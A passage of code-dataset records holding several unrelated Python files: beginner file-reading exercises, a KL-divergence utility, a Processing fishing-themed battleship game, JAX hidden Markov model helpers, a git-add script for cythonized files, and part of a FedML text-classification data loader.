completed')\n\nemp_object.display()\n\n\n\n\n\n\n","sub_path":"SerializationandDeserialization/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"485695236","text":"#exercise4\nfile1 = open(\"week4.txt\")\nfor line in file1 :\n x = line.split()\n print(x)\n#Exercise 5\nfile2 = open(\"mbox-short.txt\")\ncount = 0\nfor line in file2:\n if line.startswith('From'):\n count = count + 1\n m = line.split()\n print(m[1])\nprint(count)\n\n","sub_path":"week4.py","file_name":"week4.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"499427533","text":"import numpy as np\n\n\ndef kl_divergence_multivariate_gaussians(mu_a, mu_b, cov_a, cov_b):\n \"\"\"\n Compute the KL divergence between two multivariate Gaussians, i.e. KL(P_a || P_b)\n\n Derivation: See https://stanford.edu/~jduchi/projects/general_notes.pdf\n :param mu_a: mean of distribution a\n :param mu_b: mean of distribution b\n :param cov_a: covariance of distribution a\n :param cov_b: covariance of distribution b\n :return: KL(P_a || P_b)\n \"\"\"\n num_dims = len(mu_a)\n cov_b_inv = np.linalg.inv(cov_b)\n\n return 0.5 * (\n + np.linalg.slogdet(cov_b)[1] - np.linalg.slogdet(cov_a)[1]\n - num_dims\n + np.trace(cov_b_inv @ cov_a)\n + (mu_b - mu_a).T @ (cov_b_inv @ (mu_b - mu_a))\n )\n\n\ndef polynomial_basis_function(x, degree):\n return x ** degree\n\n\ndef expand(x, bf, bf_args=None):\n if bf_args is None:\n return np.concatenate([np.ones((len(x), 1)), bf(x)], axis=1)\n else:\n return np.concatenate([np.ones(x.shape)] + [bf(x, bf_arg) for bf_arg in bf_args], axis=1)\n","sub_path":"examples/bayesian_linear_regression/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"206316838","text":"import random\nx = 0\ny = 0\nx_worm = 330\nworm_width = 48\ny_worm = 41\nworm_height = 48\nscene = 1\nused_coordinates = []\nfish_coordinates = []\ncurrent_coordinates = []\np1_caught_fish = []\np2_caught_fish = []\nhit_coords_one = []\nhit_coords_two = []\nmiss_coordinates = []\np1_fish_order = []\np2_fish_order = []\np1_point_counter = 0\np2_point_counter = 0\np1_fish_counter = 0\np2_fish_counter = 0\nplayer_one_turn = True\nrandomize_counter = 5\ncaught_counter = 0\nturn_counter = 0\nbonus_points = [50, 100, 150, 200, 250]\ntotal_coordinates = 15\nfish_coordinates = []\njellyfish_coordinates = []\njellyfish_starting = []\njellyfish_health = 1\nsilverfish_coordinates = []\nsilverfish_starting = []\nsilverfish_health = 2\nfluffy_coordinates = []\nfluffy_starting = []\nfluffy_health = 3\nshark_coordinates = []\nshark_starting = []\nshark_health = 4\nmullet_coordinates = []\nmullet_starting = []\nmullet_health = 5\nrandomization_counter = 5\n\n\ndef setup():\n size(1093, 615)\n global grid, silverfish, fluffy, shark, mullet, jellyfish\n global player1_turn, player2_turn, start_fishing, p1, p2, worm\n global hole, p1_buoy, p2_buoy, instructions_1, instructions_2\n global mainscreen, silverfish, fluffy, shark, jellyfish\n global p1_win, p2_win, tie, x_axis, y_axis, missing_jellyfish\n global missing_silverfish, missing_fluffy, missing_shark, missing_mullet\n\n grid = loadImage(\"grid.png\")\n silverfish = loadImage(\"silverfish.png\")\n fluffy = loadImage(\"fluffy.png\")\n shark = loadImage(\"shark.png\")\n mullet = loadImage(\"mullet.png\")\n jellyfish = loadImage(\"jellyfish.png\")\n player1_turn = loadImage(\"player1_turn.png\")\n player2_turn = loadImage(\"player2_turn.png\")\n start_fishing = loadImage(\"start_fishing.png\")\n p1 = loadImage(\"p1.png\")\n p2 = loadImage(\"p2.png\")\n worm = loadImage(\"worm.png\")\n hole = loadImage(\"hole.png\")\n p1_buoy = loadImage(\"p1_buoy.png\")\n p2_buoy = loadImage(\"p2_buoy.png\")\n mainscreen = loadImage(\"mainscreen.png\")\n instructions_1 = loadImage(\"instructions_1.png\")\n instructions_2 = loadImage(\"instructions_2.png\")\n p1_win = loadImage(\"p1_win.png\")\n p2_win = loadImage(\"p2_win.png\")\n tie = loadImage(\"its_a_tie.png\")\n x_axis = loadImage(\"x_axis.png\")\n y_axis = loadImage(\"y_axis.png\")\n missing_jellyfish = loadImage(\"missing_jellyfish.png\")\n missing_silverfish = loadImage(\"missing_silverfish.png\")\n missing_fluffy = loadImage(\"missing_fluffy.png\")\n missing_shark = loadImage(\"missing_shark.png\")\n missing_mullet = loadImage(\"missing_mullet.png\")\n\n\ndef load_picture(picture, x_position, y_position, x_size, y_size):\n try:\n image(picture, x_position, y_position, x_size, y_size)\n except:\n rect(x_position, y_position, x_size, y_size)\n\n\ndef fish_randomize(health, starting_coordinates, fish_type_coordinates):\n global randomize_counter, fish_coordinates, randomization_counter\n orientation = 0\n duplicate_counter = 0\n starting_coordinates.append(random.randint(0, 9))\n starting_coordinates.append(random.randint(0, 9))\n fish_type_coordinates.append(starting_coordinates)\n horizontal_coordinates = starting_coordinates[0]\n vertical_coordinates = starting_coordinates[1]\n\n orientation = random.randint(1, 2)\n if orientation == 1:\n for i in range(health):\n if health == 2 and horizontal_coordinates > 8:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates - (i))\n expanded_coordinates.append(vertical_coordinates)\n fish_type_coordinates.append(expanded_coordinates)\n elif health == 2 and horizontal_coordinates < 9:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates + (i))\n expanded_coordinates.append(vertical_coordinates)\n fish_type_coordinates.append(expanded_coordinates)\n elif health == 3 and horizontal_coordinates > 7:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates - (i))\n expanded_coordinates.append(vertical_coordinates)\n fish_type_coordinates.append(expanded_coordinates)\n elif health == 3 and horizontal_coordinates < 8:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates + (i))\n expanded_coordinates.append(vertical_coordinates)\n fish_type_coordinates.append(expanded_coordinates)\n elif health == 4 and horizontal_coordinates > 6:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates - (i))\n expanded_coordinates.append(vertical_coordinates)\n fish_type_coordinates.append(expanded_coordinates)\n elif health == 4 and horizontal_coordinates < 7:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates + (i))\n expanded_coordinates.append(vertical_coordinates)\n fish_type_coordinates.append(expanded_coordinates)\n elif health == 5 and horizontal_coordinates > 5:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates - (i))\n expanded_coordinates.append(vertical_coordinates)\n fish_type_coordinates.append(expanded_coordinates)\n else:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates + (i))\n expanded_coordinates.append(vertical_coordinates)\n fish_type_coordinates.append(expanded_coordinates)\n\n else:\n for i in range(health):\n if health == 2 and vertical_coordinates > 8:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates)\n expanded_coordinates.append(vertical_coordinates - (i))\n fish_type_coordinates.append(expanded_coordinates)\n elif health == 2 and vertical_coordinates < 9:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates)\n expanded_coordinates.append(vertical_coordinates + (i))\n fish_type_coordinates.append(expanded_coordinates)\n elif health == 3 and vertical_coordinates > 7:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates)\n expanded_coordinates.append(vertical_coordinates - (i))\n fish_type_coordinates.append(expanded_coordinates)\n elif health == 3 and vertical_coordinates < 8:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates)\n expanded_coordinates.append(vertical_coordinates + (i))\n fish_type_coordinates.append(expanded_coordinates)\n elif health == 4 and vertical_coordinates > 6:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates)\n expanded_coordinates.append(vertical_coordinates - (i))\n fish_type_coordinates.append(expanded_coordinates)\n elif health == 4 and vertical_coordinates < 7:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates)\n expanded_coordinates.append(vertical_coordinates + (i))\n fish_type_coordinates.append(expanded_coordinates)\n elif health == 5 and vertical_coordinates > 5:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates)\n expanded_coordinates.append(vertical_coordinates - (i))\n fish_type_coordinates.append(expanded_coordinates)\n else:\n expanded_coordinates = []\n expanded_coordinates.append(horizontal_coordinates)\n expanded_coordinates.append(vertical_coordinates + (i))\n fish_type_coordinates.append(expanded_coordinates)\n fish_type_coordinates.pop(1)\n fish_coordinates.append(fish_type_coordinates)\n randomization_counter -= 1\n\n\ndef check_hit(coordinates, current_coordinates):\n global p1_point_counter, p2_point_counter\n global current_coordiantes, total_coordinates\n global p1_fish_counter, p2_fish_counter\n global p1_fish_order, p2_fish_order\n iteration_counter = 0\n match_result = False\n for i in range(len(coordinates)):\n j_removal_counter = 0\n for j in range(len(coordinates[i])):\n iteration_counter += 1\n if coordinates[i][j - j_removal_counter] == current_coordinates:\n match_result = True\n del coordinates[i][j - j_removal_counter]\n j_removal_counter += 1\n total_coordinates -= 1\n if coordinates[i] == []:\n if player_one_turn:\n p1_point_counter += 100 + bonus_points[i]\n p1_caught_fish.append(bonus_points[i])\n p1_fish_counter += 1\n p1_fish_order.append([p1_fish_counter, bonus_points[i]])\n hit_coords_one.append(current_coordinates)\n else:\n p2_point_counter += 100 + bonus_points[i]\n p2_caught_fish.append(bonus_points[i])\n p2_fish_counter += 1\n p2_fish_order.append([p2_fish_counter, bonus_points[i]])\n hit_coords_two.append(current_coordinates)\n else:\n if player_one_turn:\n p1_point_counter += 100\n hit_coords_one.append(current_coordinates)\n else:\n p2_point_counter += 100\n hit_coords_two.append(current_coordinates)\n else:\n if iteration_counter == total_coordinates and not match_result:\n miss_coordinates.append(current_coordinates)\n\n\ndef check_caught(coordinates):\n global caught_counter, total_coordinates\n for i in range(len(coordinates)):\n if coordinates[i] == []:\n if i == 0:\n coordinates[i].append('jellyfish')\n caught_counter += 1\n total_coordinates += 1\n elif i == 1:\n coordinates[i].append('silverfish')\n caught_counter += 1\n total_coordinates += 1\n elif i == 2:\n coordinates[i].append('fluffy')\n caught_counter += 1\n total_coordinates += 1\n elif i == 3:\n coordinates[i].append('shark')\n caught_counter += 1\n total_coordinates += 1\n else:\n coordinates[i].append('mullet')\n caught_counter += 1\n total_coordinates += 1\n\n\ndef check_end_game(caught_counter):\n global scene\n if caught_counter == 5:\n scene = 5\n\n\ndef switch_turn():\n global turn_counter\n global player_one_turn\n if turn_counter % 2 == 1:\n player_one_turn = True\n else:\n player_one_turn = False\n turn_counter += 1\n\n\ndef draw():\n global x_worm, y_worm, worm_width, worm_height, x\n\n if scene == 1:\n if x >= 3300:\n x = -800\n else:\n x += 7\n load_picture(mainscreen, 0, 0, 1093, 615)\n load_picture(jellyfish, x-100, 196, 80, 80)\n load_picture(silverfish, x-1800, 472, 195, 80)\n load_picture(fluffy, x-1400, 196, 220, 80)\n load_picture(shark, x-800, 468, 440, 160)\n\n elif scene == 2:\n load_picture(instructions_1, 0, 0, 1093, 615)\n\n elif scene == 3:\n load_picture(instructions_2, 0, 0, 1093, 615)\n\n elif scene == 4:\n if x >= 3000:\n x += 0\n else:\n x += 30\n\n while randomization_counter != 0:\n fish_randomize(jellyfish_health, jellyfish_starting, jellyfish_coordinates)\n fish_randomize(silverfish_health, silverfish_starting, silverfish_coordinates)\n fish_randomize(fluffy_health, fluffy_starting, fluffy_coordinates)\n fish_randomize(shark_health, shark_starting, shark_coordinates)\n fish_randomize(mullet_health, mullet_starting, mullet_coordinates)\n print(fish_coordinates)\n\n background(122, 190, 255)\n load_picture(grid, 330, 41, 480, 480)\n load_picture(x_axis, 330, -2, 480, 48)\n load_picture(y_axis, 282, 43, 48, 480)\n load_picture(missing_jellyfish, 5, 2, 60, 60)\n load_picture(missing_jellyfish, 1029, 2, 60, 60)\n load_picture(missing_silverfish, 5, 66, 117, 60)\n load_picture(missing_silverfish, 942, 66, 117, 60)\n load_picture(missing_fluffy, 5, 130, 165, 60)\n load_picture(missing_fluffy, 924, 130, 165, 60)\n load_picture(missing_shark, 5, 194, 220, 80)\n load_picture(missing_shark, 869, 194, 260, 80)\n load_picture(missing_mullet, 5, 278, 236, 80)\n load_picture(missing_mullet, 857, 278, 232, 80)\n\n for i in range(len(hit_coords_one)):\n load_picture(p1_buoy, hit_coords_one[i][0] * 48 + 342, hit_coords_one[i][1] * 48 + 50, 48, 46)\n\n for i in range(len(hit_coords_two)):\n load_picture(p2_buoy, hit_coords_two[i][0] * 48 + 342, hit_coords_two[i][1] * 48 + 50, 48, 46)\n\n for i in range(len(miss_coordinates)):\n load_picture(hole, miss_coordinates[i][0] * 48 + 337, miss_coordinates[i][1] * 48 + 53, 44, 32)\n\n# ARROW VISUAL\n load_picture(worm, x_worm, y_worm, worm_width, worm_height)\n\n textSize(48)\n fill(255)\n load_picture(start_fishing, x - 1100, 100, 1018, 368)\n load_picture(p1, 51, 360, 180, 200)\n load_picture(p2, 858, 360, 180, 200)\n text(p1_point_counter, 83, 592)\n text(p2_point_counter, 890, 592)\n\n# CAUGHT FISH P1\n fill(122, 190, 255)\n noStroke()\n for i in p1_caught_fish:\n if i == 50:\n load_picture(jellyfish, 4, 2, 60, 60)\n rect(1029, 2, 60, 60)\n elif i == 100:\n load_picture(silverfish, 4, 66, 146, 60)\n rect(942, 66, 146, 60)\n elif i == 150:\n load_picture(fluffy, 4, 130, 165, 60)\n rect(924, 130, 165, 60)\n elif i == 200:\n load_picture(shark, 4, 194, 220, 80)\n rect(869, 194, 220, 80)\n elif i == 250:\n load_picture(mullet, 4, 278, 236, 80)\n rect(857, 278, 232, 80)\n# CAUGHT FISH P2\n for i in p2_caught_fish:\n if i == 50:\n load_picture(jellyfish, 1029, 2, 60, 60)\n rect(4, 2, 60, 60)\n elif i == 100:\n load_picture(silverfish, 942, 66, 146, 60)\n rect(4, 66, 146, 60)\n elif i == 150:\n load_picture(fluffy, 924, 130, 165, 60)\n rect(4, 130, 165, 60)\n elif i == 200:\n load_picture(shark, 869, 194, 220, 80)\n rect(4, 194, 220, 80)\n elif i == 250:\n load_picture(mullet, 857, 278, 232, 80)\n rect(4, 278, 236, 80)\n\n\n# TURN BANNER\n if player_one_turn:\n load_picture(player1_turn, 362, 534, 368, 80)\n else:\n load_picture(player2_turn, 362, 534, 368, 80)\n\n elif scene == 5:\n if x >= 3300:\n x = -800\n else:\n x += 5\n\n background(122, 190, 255)\n textSize(60)\n fill(255)\n\n tint(122, 190, 255, 200)\n load_picture(shark, x - 300, 300, 183, 60)\n load_picture(mullet, x - 400, 100, 200, 60)\n load_picture(jellyfish, x - 70, 500, 30, 30)\n load_picture(jellyfish, x - 1100, 415, 30, 30)\n load_picture(silverfish, x - 1700, 150, 81, 30)\n load_picture(fluffy, x - 1500, 400, 92, 30)\n load_picture(shark, x - 700, 250, 183, 60)\n load_picture(mullet, x - 1200, 700, 200, 60)\n load_picture(jellyfish, x - 1600, 500, 30, 30)\n load_picture(fluffy, x - 1000, 651, 92, 30)\n load_picture(jellyfish, x - 1100, 5, 30, 30)\n load_picture(silverfish, x - 1700, 600, 81, 30)\n tint(122, 190, 255, 100)\n load_picture(silverfish, x - 100, 450, 81, 30)\n load_picture(fluffy, x - 500, 700, 92, 30)\n load_picture(shark, x - 1300, 150, 183, 60)\n load_picture(mullet, x - 1400, 3, 200, 60)\n load_picture(fluffy, x - 550, 286, 92, 30)\n load_picture(shark, x - 650, 170, 183, 60)\n load_picture(mullet, x - 700, 53, 200, 60)\n load_picture(jellyfish, x - 850, 500, 60, 30)\n\n noTint()\n# SCORE DISPLAY\n text(p1_point_counter, 389, 312)\n text(p2_point_counter, 640, 312)\n\n# DISPLAYING CAUGHT FISH\n load_picture(p1, 389, 400, 140, 200)\n load_picture(p2, 640, 400, 144, 200)\n\n# CAUGHT FISH P1\n for i in p1_fish_order:\n if i[0] == 1:\n if i[1] == 50:\n load_picture(jellyfish, 4, 268, 52, 52)\n elif i[1] == 100:\n load_picture(silverfish, 4, 268, 138, 52)\n elif i[1] == 150:\n load_picture(fluffy, 4, 268, 157, 52)\n elif i[1] == 200:\n load_picture(shark, 4, 268, 160, 60)\n elif i[1] == 250:\n load_picture(mullet, 4, 268, 180, 60)\n elif i[0] == 2:\n if i[1] == 50:\n load_picture(jellyfish, 4, 332, 52, 52)\n elif i[1] == 100:\n load_picture(silverfish, 4, 332, 138, 52)\n elif i[1] == 150:\n load_picture(fluffy, 4, 332, 157, 52)\n elif i[1] == 200:\n load_picture(shark, 4, 332, 160, 60)\n elif i[1] == 250:\n load_picture(mullet, 4, 332, 180, 60)\n elif i[0] == 3:\n if i[1] == 50:\n load_picture(jellyfish, 4, 396, 52, 52)\n elif i[1] == 100:\n load_picture(silverfish, 4, 396, 138, 52)\n elif i[1] == 150:\n load_picture(fluffy, 4, 396, 157, 52)\n elif i[1] == 200:\n load_picture(shark, 4, 396, 160, 60)\n elif i[1] == 250:\n load_picture(mullet, 4, 396, 180, 60)\n elif i[0] == 4:\n if i[1] == 50:\n load_picture(jellyfish, 4, 460, 52, 52)\n elif i[1] == 100:\n load_picture(silverfish, 4, 460, 138, 52)\n elif i[1] == 150:\n load_picture(fluffy, 4, 460, 157, 52)\n elif i[1] == 200:\n load_picture(shark, 4, 460, 160, 60)\n elif i[1] == 250:\n load_picture(mullet, 4, 460, 180, 60)\n elif i[0] == 5:\n if i[1] == 50:\n load_picture(jellyfish, 4, 524, 52, 52)\n elif i[1] == 100:\n load_picture(silverfish, 4, 524, 138, 52)\n elif i[1] == 150:\n load_picture(fluffy, 4, 524, 157, 52)\n elif i[1] == 200:\n load_picture(shark, 4, 524, 160, 60)\n elif i[1] == 250:\n load_picture(mullet, 4, 524, 180, 60)\n\n# CAUGHT FISH P2\n for i in p2_fish_order:\n if i[0] == 1:\n if i[1] == 50:\n load_picture(jellyfish, 1029, 268, 52, 52)\n elif i[1] == 100:\n load_picture(silverfish, 942, 268, 138, 52)\n elif i[1] == 150:\n load_picture(fluffy, 924, 268, 157, 52)\n elif i[1] == 200:\n load_picture(shark, 909, 268, 160, 60)\n elif i[1] == 250:\n load_picture(mullet, 889, 268, 180, 60)\n elif i[0] == 2:\n if i[1] == 50:\n load_picture(jellyfish, 1029, 332, 52, 52)\n elif i[1] == 100:\n load_picture(silverfish, 942, 332, 138, 52)\n elif i[1] == 150:\n load_picture(fluffy, 924, 332, 157, 52)\n elif i[1] == 200:\n load_picture(shark, 909, 332, 160, 60)\n elif i[1] == 250:\n load_picture(mullet, 889, 332, 180, 60)\n elif i[0] == 3:\n if i[1] == 50:\n load_picture(jellyfish, 1029, 396, 52, 52)\n elif i[1] == 100:\n load_picture(silverfish, 942, 396, 138, 52)\n elif i[1] == 150:\n load_picture(fluffy, 924, 396, 157, 52)\n elif i[1] == 200:\n load_picture(shark, 909, 396, 160, 60)\n elif i[1] == 250:\n load_picture(mullet, 889, 396, 180, 60)\n elif i[0] == 4:\n if i[1] == 50:\n load_picture(jellyfish, 1029, 460, 52, 52)\n elif i[1] == 100:\n load_picture(silverfish, 942, 460, 138, 52)\n elif i[1] == 150:\n load_picture(fluffy, 924, 460, 157, 52)\n elif i[1] == 200:\n load_picture(shark, 909, 460, 160, 60)\n elif i[1] == 250:\n load_picture(mullet, 889, 460, 180, 60)\n elif i[0] == 5:\n if i[1] == 50:\n load_picture(jellyfish, 1029, 524, 52, 52)\n elif i[1] == 100:\n load_picture(silverfish, 942, 524, 138, 52)\n elif i[1] == 150:\n load_picture(fluffy, 924, 524, 157, 52)\n elif i[1] == 200:\n load_picture(shark, 909, 524, 160, 60)\n elif i[1] == 250:\n load_picture(mullet, 889, 524, 180, 60)\n\n if p1_point_counter > p2_point_counter:\n load_picture(p1_win, 0, 0, 1093, 615)\n\n elif p1_point_counter < p2_point_counter:\n load_picture(p2_win, 0, 0, 1093, 615)\n else:\n load_picture(tie, 0, 0, 1093, 615)\n else:\n pass\n\n\n# ARROW NAVIGATION\ndef keyPressed():\n global x_worm, y_worm, worm_width, worm_height, scene\n load_picture(worm, x_worm, y_worm, worm_width, worm_height)\n if (key == CODED):\n if (keyCode == LEFT):\n if x_worm == 330:\n pass\n else:\n x_worm -= 48\n load_picture(worm, x_worm, y_worm, worm_width, worm_height)\n elif (keyCode == RIGHT):\n if x_worm == 768:\n pass\n else:\n x_worm += 48\n load_picture(worm, x_worm, y_worm, worm_width, worm_height)\n elif (keyCode == UP):\n if y_worm == 41:\n pass\n else:\n y_worm -= 48\n load_picture(worm, x_worm, y_worm, worm_width, worm_height)\n elif (keyCode == DOWN):\n if y_worm == 486:\n pass\n else:\n y_worm += 48\n load_picture(worm, x_worm, y_worm, worm_width, worm_height)\n\n# BUTTON CONFIRM\n if (key == ENTER):\n if scene == 1:\n scene += 1\n\n elif scene == 2:\n scene += 1\n\n elif scene == 3:\n scene += 1\n\n elif scene == 4:\n current_coordinates = []\n xcoordinate = (x_worm - 330)/48\n ycoordinate = (y_worm - 41)/48\n current_coordinates.append(xcoordinate)\n current_coordinates.append(ycoordinate)\n\n# COORDINATE VALIDITY\n if current_coordinates in used_coordinates:\n pass\n else:\n used_coordinates.append(current_coordinates)\n check_hit(fish_coordinates, current_coordinates)\n check_caught(fish_coordinates)\n check_end_game(caught_counter)\n switch_turn()\n else:\n pass\n","sub_path":"development/sketch_119.pyde","file_name":"sketch_119.pyde","file_ext":"pyde","file_size_in_byte":24735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"65647836","text":"# Common functions that can be used for any hidden markov model type.\n# Author: Aleyna Kara(@karalleyna)\n\nimport jax.numpy as jnp\nimport matplotlib.pyplot as plt\nfrom jax import vmap, jit\nfrom jax.random import split, randint, PRNGKey, permutation\nfrom functools import partial\n# !pip install graphviz\nfrom graphviz import Digraph\n\n\n@partial(jit, static_argnums=(2,))\ndef hmm_sample_minibatches(observations, valid_lens, batch_size, rng_key):\n '''\n Creates minibatches consists of the random permutations of the\n given observation sequences\n\n Parameters\n ----------\n observations : array(N, seq_len)\n All observation sequences\n\n valid_lens : array(N, seq_len)\n Consists of the valid length of each observation sequence\n\n batch_size : int\n The number of observation sequences that will be included in\n each minibatch\n\n rng_key : array\n Random key of shape (2,) and dtype uint32\n\n Returns\n -------\n * array(num_batches, batch_size, max_len)\n Minibatches\n '''\n num_train = len(observations)\n perm = permutation(rng_key, num_train)\n\n def create_mini_batch(batch_idx):\n return observations[batch_idx], valid_lens[batch_idx]\n\n num_batches = num_train // batch_size\n batch_indices = perm.reshape((num_batches, -1))\n minibatches = vmap(create_mini_batch)(batch_indices)\n return minibatches\n\n\n@partial(jit, static_argnums=(1, 2, 3))\ndef hmm_sample_n(params, sample_fn, n, max_len, rng_key):\n '''\n Generates n observation sequences from the given Hidden Markov Model\n\n Parameters\n ----------\n params : HMMNumpy or HMMJax\n Hidden Markov Model\n\n sample_fn :\n The sample function of the given hidden markov model\n\n n : int\n The total number of observation sequences\n\n max_len : int\n The upper bound of the length of each observation sequence. Note that the valid length of the observation\n sequence is less than or equal to the upper bound.\n\n rng_key : array\n Random key of shape (2,) and dtype uint32\n\n Returns\n -------\n * array(n, max_len)\n Observation sequences\n '''\n\n def sample_(params, n_samples, key):\n return sample_fn(params, n_samples, key)[1]\n\n rng_key, rng_lens = split(rng_key)\n lens = randint(rng_lens, (n,), minval=1, maxval=max_len + 1)\n keys = split(rng_key, n)\n observations = vmap(sample_, in_axes=(None, None, 0))(params, max_len, keys)\n return observations, lens\n\n\n@jit\ndef pad_sequences(observations, valid_lens, pad_val=0):\n '''\n Generates n observation sequences from the given Hidden Markov Model\n\n Parameters\n ----------\n\n observations : array(N, seq_len)\n All observation sequences\n\n valid_lens : array(N, seq_len)\n Consists of the valid length of each observation sequence\n\n pad_val : int\n Value that the invalid observable events of the observation sequence will be replaced\n\n Returns\n -------\n * array(n, max_len)\n Ragged dataset\n '''\n\n def pad(seq, len):\n idx = jnp.arange(1, seq.shape[0] + 1)\n return jnp.where(idx <= len, seq, pad_val)\n\n ragged_dataset = vmap(pad, in_axes=(0, 0))(observations, valid_lens), valid_lens\n return ragged_dataset\n\n\ndef hmm_plot_graphviz(trans_mat, obs_mat, states=[], observations=[]):\n \"\"\"\n Visualizes HMM transition matrix and observation matrix using graphhiz.\n\n Parameters\n ----------\n trans_mat, obs_mat, init_dist: arrays\n\n states: List(num_hidden)\n Names of hidden states\n\n observations: List(num_obs)\n Names of observable events\n\n Returns\n -------\n dot object, that can be displayed in colab\n \"\"\"\n\n n_states, n_obs = obs_mat.shape\n\n dot = Digraph(comment='HMM')\n if not states:\n states = [f'State {i + 1}' for i in range(n_states)]\n if not observations:\n observations = [f'Obs {i + 1}' for i in range(n_obs)]\n\n # Creates hidden state nodes\n for i, name in enumerate(states):\n table = [f'{observations[j]}{\"%.2f\" % prob}' for j, prob in\n enumerate(obs_mat[i])]\n label = f'''<{''.join(table)}
{name}
>'''\n dot.node(f's{i}', label=label)\n\n # Writes transition probabilities\n for i in range(n_states):\n for j in range(n_states):\n dot.edge(f's{i}', f's{j}', label=str('%.2f' % trans_mat[i, j]))\n dot.attr(rankdir='LR')\n # dot.render(file_name, view=True)\n return dot\n","sub_path":"jsl/hmm/hmm_utils.py","file_name":"hmm_utils.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"180152806","text":"import os\nfrom glob import glob\n\n# get *.pyx files\npyxfiles = []\npxd_include_dirs = [\n directory for directory, dirs, files in os.walk('pytraj')\n if '__init__.pyx' in files or '__init__.pxd' in files\n or '__init__.py' in files\n]\n\npxd_include_patterns = [\n p + '/*.pxd' for p in pxd_include_dirs]\n\nfor p in pxd_include_dirs:\n pyxfiles.extend([ext.split(\".\")[0] for ext in glob(p + '/*.pyx') if '.pyx' in ext])\n\nprint(\"move old cythonized files to ./trash folder\")\nfor ext_name in pyxfiles:\n pyxfile = ext_name + \".cpp\"\n do_this = \"git add %s\" % pyxfile\n os.system(do_this)\n","sub_path":"scripts/add_cythonized_files.py","file_name":"add_cythonized_files.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"215212664","text":"import os\n\nimport numpy as np\nimport torch\nfrom transformers import (\n BertConfig,\n BertTokenizer,\n DistilBertConfig,\n DistilBertTokenizer,\n)\nfrom fedml.model.nlp.model_args import *\nfrom fedml.data.fednlp.base.data_manager.base_data_manager import BaseDataManager\nfrom .text_classification_data_manager import (\n TextClassificationDataManager,\n)\n\nfrom .text_classification_preprocessor import (\n TLMPreprocessor as TCPreprocessor,\n)\n\n# from fedml.data.FederatedEMNIST.data_loader import load_partition_data_federated_emnist\n# from fedml.data.ImageNet.data_loader import load_partition_data_ImageNet\n# from fedml.data.Landmarks.data_loader import load_partition_data_landmarks\n# from fedml.data.MNIST.data_loader import load_partition_data_mnist\n# from fedml.data.cifar10.data_loader import load_partition_data_cifar10\n# from fedml.data.cifar100.data_loader import load_partition_data_cifar100\n# from fedml.data.cinic10.data_loader import load_partition_data_cinic10\n# from fedml.data.fed_cifar100.data_loader import load_partition_data_federated_cifar100\n# from fedml.data.fed_shakespeare.data_loader import (\n# load_partition_data_federated_shakespeare,\n# )\n# from fedml.data.shakespeare.data_loader import load_partition_data_shakespeare\n# from fedml.data.stackoverflow_lr.data_loader import (\n# load_partition_data_federated_stackoverflow_lr,\n# )\n# from fedml.data.stackoverflow_nwp.data_loader import (\n# load_partition_data_federated_stackoverflow_nwp,\n# )\n#\n# from .MNIST.data_loader import download_mnist\n# from .edge_case_examples.data_loader import load_poisoned_dataset\nimport logging\n\n\ndef load(args):\n return load_synthetic_data(args)\n\n\ndef combine_batches(batches):\n full_x = torch.from_numpy(np.asarray([])).float()\n full_y = torch.from_numpy(np.asarray([])).long()\n for (batched_x, batched_y) in batches:\n full_x = torch.cat((full_x, batched_x), 0)\n full_y = torch.cat((full_y, batched_y), 0)\n return [(full_x, full_y)]\n\n\ndef load_synthetic_data(args):\n dataset_name = args.dataset\n # check if the centralized training is enabled\n centralized = (\n True\n if (args.client_num_in_total == 1 and args.training_type != \"cross_silo\")\n else False\n )\n\n # check if the full-batch training is enabled\n args_batch_size = args.batch_size\n if args.batch_size <= 0:\n full_batch = True\n args.batch_size = 128 # temporary batch size\n else:\n full_batch = False\n logging.info(\"load_data. dataset_name = %s\" % dataset_name)\n attributes = BaseDataManager.load_attributes(args.data_file_path)\n num_labels = len(attributes[\"label_vocab\"])\n print(list(attributes[\"label_vocab\"].keys()))\n class_num = num_labels\n model_args = ClassificationArgs()\n model_args.model_name = args.model\n model_args.model_type = args.model_type\n # model_args.load(model_args.model_name)\n model_args.num_labels = num_labels\n model_args.update_from_dict(\n {\n \"fl_algorithm\": args.federated_optimizer,\n \"freeze_layers\": args.freeze_layers,\n \"epochs\": args.epochs,\n \"learning_rate\": args.learning_rate,\n \"gradient_accumulation_steps\": args.gradient_accumulation_steps,\n \"do_lower_case\": args.do_lower_case,\n \"manual_seed\": args.random_seed,\n # for ignoring the cache features.\n \"reprocess_input_data\": args.reprocess_input_data,\n \"overwrite_output_dir\": True,\n \"max_seq_length\": args.max_seq_length,\n \"train_batch_size\": args.batch_size,\n \"eval_batch_size\": args.eval_batch_size,\n \"evaluate_during_training\": False, # Disabled for FedAvg.\n \"evaluate_during_training_steps\": args.evaluate_during_training_steps,\n \"fp16\": args.fp16,\n \"data_file_path\": args.data_file_path,\n \"partition_file_path\": 